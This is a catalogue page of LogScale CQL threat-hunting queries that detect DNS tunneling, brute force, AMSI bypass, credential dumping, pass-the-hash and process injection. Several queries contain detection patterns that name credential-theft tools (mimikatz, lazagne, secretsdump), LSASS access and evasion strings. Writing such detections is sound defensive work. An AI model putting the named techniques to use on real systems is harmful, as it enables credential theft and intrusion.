LogScale · CQL

CQL Knowledge Base

$

Ready-to-use CQL queries for threat hunting, detection, and SOC triage. Copy, filter, and search in seconds.

154 queries8 categories
Powered bySofistic·created bydarkreitor
K
20queries
PAID

DNS Tunneling Detection

Identifies potential DNS tunneling by detecting unusually long DNS query names or high query frequency to a single domain.

EventType = "DnsRequest"
| DomainName = /\.[a-z]{2,}\.[a-z]{2,}$/
| eval(domainLength = length(DomainName))
Networkdnstunneling
Advanced
FREE

Failed Authentication Spike

Detects brute-force attempts by counting authentication failures per user and source IP within a time window.

EventType = "AuthFailure"
| stats(
    count() as FailCount,
Identitybrute-forceauthentication
Beginner
PAID

Lateral Movement via SMB

Detects lateral movement using SMB protocol by correlating process events with network connections on port 445.

FileName = "cmd.exe" OR FileName = "powershell.exe"
| join(
    { NetworkEvent
EDRlateral-movementsmb
Intermediate
PAID

AD Brute Force / Password Spray (NGSIEM)

Detects accounts with multiple authentication failures in Active Directory — indicator of brute force or password spray attacks.

#event_simpleName=ActiveDirectoryAuthenticationFailure | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 50 | sort(_count, limit=20)
Identitysofisticngsiem
Intermediate
PAID

AD Privileged Group Membership Change

Detects additions or removals to privileged Active Directory groups such as Domain Admins or Enterprise Admins.

#event_simpleName=ActiveDirectoryAuditGroupMemberModified | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 3 | sort(_count, limit=20)
Identitysofisticngsiem
Intermediate
PAID

AMSI Bypass Attempt

Detects AMSI bypass attempts via PowerShell reflection or string obfuscation techniques used to evade AV/EDR scanning.

#event_simpleName=ProcessRollup2 CommandLine=/(amsiInitFailed|AmsiUtils|amsi\.dll|SetValue.*amsiContext|Reflection\.Assembly.*amsi)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | sort(_count, limit=20)
EDRsofisticdefense-evasion
Advanced
PAID

Anomalous DNS Query Volume

Identifies hosts generating abnormally high DNS query volumes, a common indicator of DNS tunneling or C2 beaconing.

#event_simpleName=DnsRequest | groupBy([ComputerName], function=[count(), collect([DomainName])]) | _count > 5000 | sort(_count, limit=20)
Networksofisticexfiltration
Intermediate
PAID

Azure NSG Rule Changes

Detects additions or modifications to Azure Network Security Group rules that may expose resources to the internet.

#event_simpleName=AzureNetworkSecurityGroupRule | groupBy([SecurityRuleName, SecurityRuleDirection, SecurityRuleAccess], function=count()) | _count > 10 | sort(_count, limit=20)
Cloudsofisticngsiem
Intermediate
PAID

Brute Force / Password Spray

Detects accounts with more than 100 type-3 (network) logon failures in 24h — indicative of brute force or password spray.

#event_simpleName=UserLogon LogonType=3 | groupBy([UserName, ComputerName], function=count()) | _count > 100 | sort(_count, limit=20)
Identitysofisticbrute-force
Intermediate
PAID

Credential Dumping Tools

Detects execution of known credential dumping tools (Mimikatz, fgdump, gsecdump, pwdump) on Windows endpoints.

#event_simpleName=ProcessRollup2 FileName=/(mimikatz|procdump|pwdump|wce|lazagne|gsecdump|secretsdump)/i | groupBy([ComputerName, UserName, FileName], function=count()) | _count > 2 | sort(_count, limit=20)
EDRsofisticcredential-access
Advanced
FREE

CSPM Policy Violations

Detects cloud security policy (CSPM) violations in Azure/GCP including public storage, missing encryption, and exposed management ports.

product_cspm=true | groupBy([#event_simpleName, azure_application_name, disposition], function=count()) | _count > 20 | sort(_count, limit=20)
Cloudsofisticngsiem
Beginner
FREE

Data Staging via Archive Tools

Detects use of compression utilities (7z, rar, zip) to package large volumes of data — a pre-exfiltration staging indicator.

#event_simpleName=ProcessRollup2 FileName=/(7z|7za|rar|winrar|zip|tar|makecab)\.exe/i CommandLine=/(\\Users\\|\\Shares\\|\\Documents\\|\\Desktop\\|-p|-r)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | _count > 3 | sort(_count, limit=20)
EDRsofisticexfiltration
Beginner
PAID

DCSync Attack Detected

Detects Directory Replication Service (DCSync) attempts used to extract password hashes from domain controllers without logging on.

#event_simpleName=DCSyncAttempted | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 5 | sort(_count, limit=20)
Identitysofisticngsiem
Advanced
PAID

DNS Exfiltration Indicators

Detects DNS queries with abnormally long subdomains (80+ chars) — indicator of DNS tunneling used for C2 or data exfiltration.

#event_simpleName=DnsRequest | DomainName=/.{80,}/ | groupBy([ComputerName, DomainName], function=count()) | _count > 3 | sort(_count, limit=20)
Networksofisticexfiltration
Intermediate
PAID

LSASS Memory Access

Detects direct access to LSASS process memory — a common technique for credential extraction via tools like Mimikatz or ProcDump.

#event_simpleName=ProcessRollup2 CommandLine=*lsass* FileName!=lsass.exe | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | _count > 2 | sort(_count, limit=20)
EDRsofisticcredential-access
Advanced
FREE

Network Share Enumeration

Detects mass network share enumeration via net view, net share, or similar tools indicative of lateral movement preparation.

#event_simpleName=ProcessRollup2 CommandLine=/(net\s+view|net\s+share|Invoke-ShareFinder|Get-NetShare|Get-DFSshare)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | _count > 5 | sort(_count, limit=20)
Threat Huntingsofisticdiscovery
Beginner
PAID

Pass-the-Hash / Overpass-the-Hash

Detects Pass-the-Hash techniques via sekurlsa, pth-winexe, Rubeus, or similar tools that abuse NTLM hashes for authentication.

#event_simpleName=ProcessRollup2 CommandLine=/(sekurlsa|pth-winexe|Invoke-SMBExec|Invoke-TheHash|Invoke-WMIExec|Overpass-the-Hash|rubeus.*ptt|rubeus.*asktgt)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | sort(_count, limit=20)
EDRsofisticlateral-movement
Advanced
PAID

PowerShell Download Cradle

Detects PowerShell downloading payloads via IEX, Invoke-WebRequest, Net.WebClient, or similar download cradle patterns.

| ...
EDRsofisticexecution
Intermediate
PAID

PowerShell Encoded Commands

Detects PowerShell execution with Base64-encoded commands (-enc, -encodedcommand) commonly used to evade AV/EDR detection.

#event_simpleName=ProcessRollup2 FileName=/(powershell|pwsh)\.exe/i CommandLine=/(\-enc|\-encodedcommand|\-e\s)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | _count > 5 | sort(_count, limit=20)
EDRsofisticexecution
Intermediate
PAID

Process Injection Indicators

Detects process injection techniques and tools via command-line indicators (OpenProcess, WriteProcessMemory, CreateRemoteThread).

#event_simpleName=ProcessRollup2 CommandLine=/(Invoke-ReflectivePEInjection|Inject-Shellcode|VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|NtMapViewOfSection|QueueUserAPC)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | sort(_count, limit=20)
EDRsofisticdefense-evasion
Advanced